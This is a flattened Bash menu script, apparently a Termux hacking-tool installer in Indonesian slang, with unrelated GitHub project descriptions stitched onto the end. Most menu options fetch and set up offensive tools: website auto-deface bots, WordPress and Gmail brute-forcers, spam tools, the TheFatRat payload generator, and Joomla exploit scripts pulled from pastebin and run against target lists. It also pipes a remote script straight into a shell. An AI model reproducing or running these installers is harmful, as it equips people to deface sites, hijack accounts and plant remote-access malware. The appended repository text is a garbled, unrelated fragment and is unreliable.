./setupTermuxArch.sh echo -e $red" Done Install Cuk " fi if [ $act = 29 ] || [ $act = 29 ] then clear echo -e $green" installing fedora " sleep 1 apt update && apt upgrade apt-get install git apt install wget git clone https://github.com/nmilosev/termux-fedora.git cd termux-fedora chmod +x termux-fedora.sh echo -e $red" Done Install Cuk " fi if [ $act = 30 ] || [ $act = 30 ] then clear echo -e $green" installing hash-Buster " sleep 1 apt update && apt upgrade apt install python2 && apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster echo -e $red" Done Install Cuk " fi if [ $act = 31 ] || [ $act = 31 ] then clear echo -e $green" installing sudo " sleep 1 apt update && apt upgrade pkg install git ncurses-utils git clone https://github.com/st42/termux-sudo.git cd termux-sudo cat sudo > /data/data/com.termux/files/usr/bin/sudo chmod 700 /data/data/com.termux/files/usr/bin/sudo echo -e $red" Done Install Cuk " fi if [ $act = 32 ] || [ $act = 32 ] then clear echo -e $green" installing aircrack-ng " sleep 1 apt-get update && apt-get upgrade apt-get install aircrack-ng echo -e $red" done install cuk " fi if [ $act = 33 ] || [ $act = 33 ] then clear echo -e $green" installing joomscan " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install perl git clone https://github.com/rezasp/joomscan.git echo -e $red" done install cuk " fi if [ $act = 34 ] || [ $act = 34 ] then clear echo -e $green" installing bing-ip2hosts " sleep 1 apt-get update && apt-get upgrade apt-get install wget wget http://www.morningstarsecurity.com/downloads/bing-ip2hosts-0.4.tar.gz && tar -xzvf bing-ip2hosts-0.4.tar.gz && cp bing-ip2hosts-0.4/bing-ip2hosts /usr/local/bin/t echo -e $red" done install cuk " fi if [ $act = 35 ] || [ $act = 35 ] then clear echo -e $green" installing BlueMaho " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluemaho.git echo -e $red" done install cuk " fi if [ $act = 36 ] || [ $act = 36 ] then clear echo -e $green" installing Bluepot " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone git://git.kali.org/packages/bluepot.git echo -e $red" done install cuk " fi if [ $act = 37 ] || [ $act = 37 ] then clear echo -e $green" installing honeypot " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install php git clone https://github.com/whackashoe/php-spam-mail-honeypot.git echo -e $red" done install cuk " fi if [ $act = 38 ] || [ $act = 38 ] then clear echo -e $green" installing bot auto deface 1 " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install wget apt-get install perl apt-get install unzip git clone https://github.com/mrcakil/bot.git cd bot unzip bot.zip cd xploit chmod 777 bot.pl echo -e $red" Lokasi bot ? /bot/xploit/bot.pl" echo -e $red" done install cuk " fi if [ $act = 39 ] || [ $act = 39 ] then clear echo -e $green" installing bot auto deface 2 " sleep 1 apt-get update && apt-get upgrade apt-get install git && apt-get install perl git clone https://github.com/Moham3dRiahi/XAttacker cd XAttacker chmod 777 XAttacker.pl echo -e $red" done install cuk " fi if [ $act = 40 ] || [ $act = 40 ] then clear echo -e $green" installing mailer-sender " sleep 1 apt-get update && apt-get upgrade apt-get install php5-cli curl -sS https://getcomposer.org/installer | php chmod +x composer.phar sudo mv composer.phar /usr/bin/composer git clone https://github.com/pedro-stanaka/mailer-cli.git echo -e $red" note !! " echo -e $red" usage php sendmail.php notification:mailer <email> <subject> <body>; " echo -e $red" or " echo -e $red" php sendmail.php --help " echo -e $red" done install cuk " fi if [ $act = 41 ] || [ $act = 41 ] then clear echo -e $green" installing wordpress brute force " sleep 1 apt-get update && apt-get upgrade apt-get install python2 pip install request git clone https://github.com/atarantini/wpbf echo -e $red" done install cuk " fi if [ $act = 42 ] || [ $act = 42 ] then clear echo -e $green" installing termux Ohmyzsh " sleep 1 apt-get update && apt-get upgrade sh -c "$(curl -fsSL https://github.com/Cabbagec/termux-ohmyzsh/raw/master/install.sh)" ~/.termux/colors.sh echo -e $red" ganti color ? ketik ~/.termux/colors.sh " echo -e $red" Done Install Cuk " fi if [ $act = 43 ] || [ $act = 43 ] then clear echo -e $green" installing Instabot instagram bot " sleep 1 apt-get update && apt-get upgrade pkg install python2 apt-get install git apt-get install nano git clone https://github.com/instabot-py/instabot.py echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd instabot.py echo -e $red" ketik nano example.py " echo -e $red" masukan username dan password mu" echo -e $red" Done cuk " fi if [ $act = 44 ] || [ $act = 44 ] then clear echo -e $green" installing fsociety " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Manisso/fsociety echo -e $red" Done Install Cuk " echo -e $red" Please wait... " echo -e $red" Please wait... " sleep 1 cd fsociety echo -e $red" python fsociety.py " fi if [ $act = 45 ] || [ $act = 45 ] then clear echo -e $green" installing CMS Scanner " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/Dionach/CMSmap.git sleep 1 cd CMSmap echo -e $red" Usage: cmsmap.py -t <URL> " fi if [ $act = 46 ] || [ $act = 46 ] then clear echo -e $green" installing INFORMATION Gathering " sleep 1 apt-get update && apt-get upgrade pkg install python apt-get install git git clone https://github.com/m4ll0k/Infoga.git infoga sleep 1 cd infoga pip install -r req echo -e $red" Usage: python infoga.py " fi if [ $act = 47 ] || [ $act = 47 ] then clear echo -e $green" installing com fabrik exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/LDvFvtUD -O com_fabrik.php sleep 1 echo -e $red" Usage: php com_fabrik.php target.txt " fi if [ $act = 48 ] || [ $act = 48 ] then clear echo -e $green" installing com foxcontact exploiter " sleep 1 apt-get update && apt-get upgrade apt-get install wget apt-get install php wget https://pastebin.com/raw/EAtSir5V -O com_foxcontact.php sleep 1 echo -e $red" Usage: php com_foxcontact.php target.txt " fi if [ $act = 49 ] || [ $act = 49 ] then clear echo -e $green" installing gmail brute force " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/JamesAndresCM/Brute_force_gmail sleep 1 echo -e $red" Usage: python2.7 brute_force_gmail.py example@gmail.com PATH_TO_DICTIONARY " fi if [ $act = 50 ] || [ $act = 50 ] then clear echo -e $green" installing ezsploit " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/rand0m1ze/ezsploit sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 51 ] || [ $act = 51 ] then clear echo -e $green" installing spammer grab " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install python2 pip install requests git clone https://github.com/p4kl0nc4t/Spammer-Grab/ sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 52 ] || [ $act = 52 ] then clear echo -e $green" installing spammer toko pedia " sleep 1 apt-get update && apt-get upgrade apt-get install git apt-get install unzip apt-get install php git clone https://github.com/mrcakil/spam cd spam unzip toko-pedia.zip sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 53 ] || [ $act = 53 ] then clear echo -e $green" installing TheFatRat " sleep 1 apt-get update && apt-get upgrade apt-get install git git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 54 ] || [ $act = 54 ] then clear echo -e $green" installing IPGeolocation " sleep 1 apt-get update && apt-get upgrade apt-get install git apt install python2 git clone https://github.com/maldevel/IPGeolocation.git cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt sleep 1 echo -e $red" Done Install cuk " fi if [ $act = 55 ] || [ $act = 55 ] then echo -e $green" pesan terakhir " sleep 1 echo -e $green" Master Hacker " sleep 1 echo -e $green"Jangan Nganggur Cuk " sleep 1 echo -e $green" Please Wait.... " sleep 1 echo -e $green" contact : mrcakil@programmer.net " sleep 1 echo -e $red" fb : https://www.facebook.com/ngintipwkwkwk " sleep 1 echo -e $red" Bye :* " sleep 1 exit fi
maysjeff / LS INS GNSS EKFLoosely Coupled INS/GNSS Error State Extended Kalman Filter in Python/C++
Doist / Py Static Checkpy_static_check can statically check your Python code for a lot of common errors
absingh31 / HammingCodeSimple python code to generate hamming code for the given binary data. And also check and correct error in received hamming code.
chschoenenberger / Dash LeafletLeaflet component for dash. Illustration of error encountered during python build.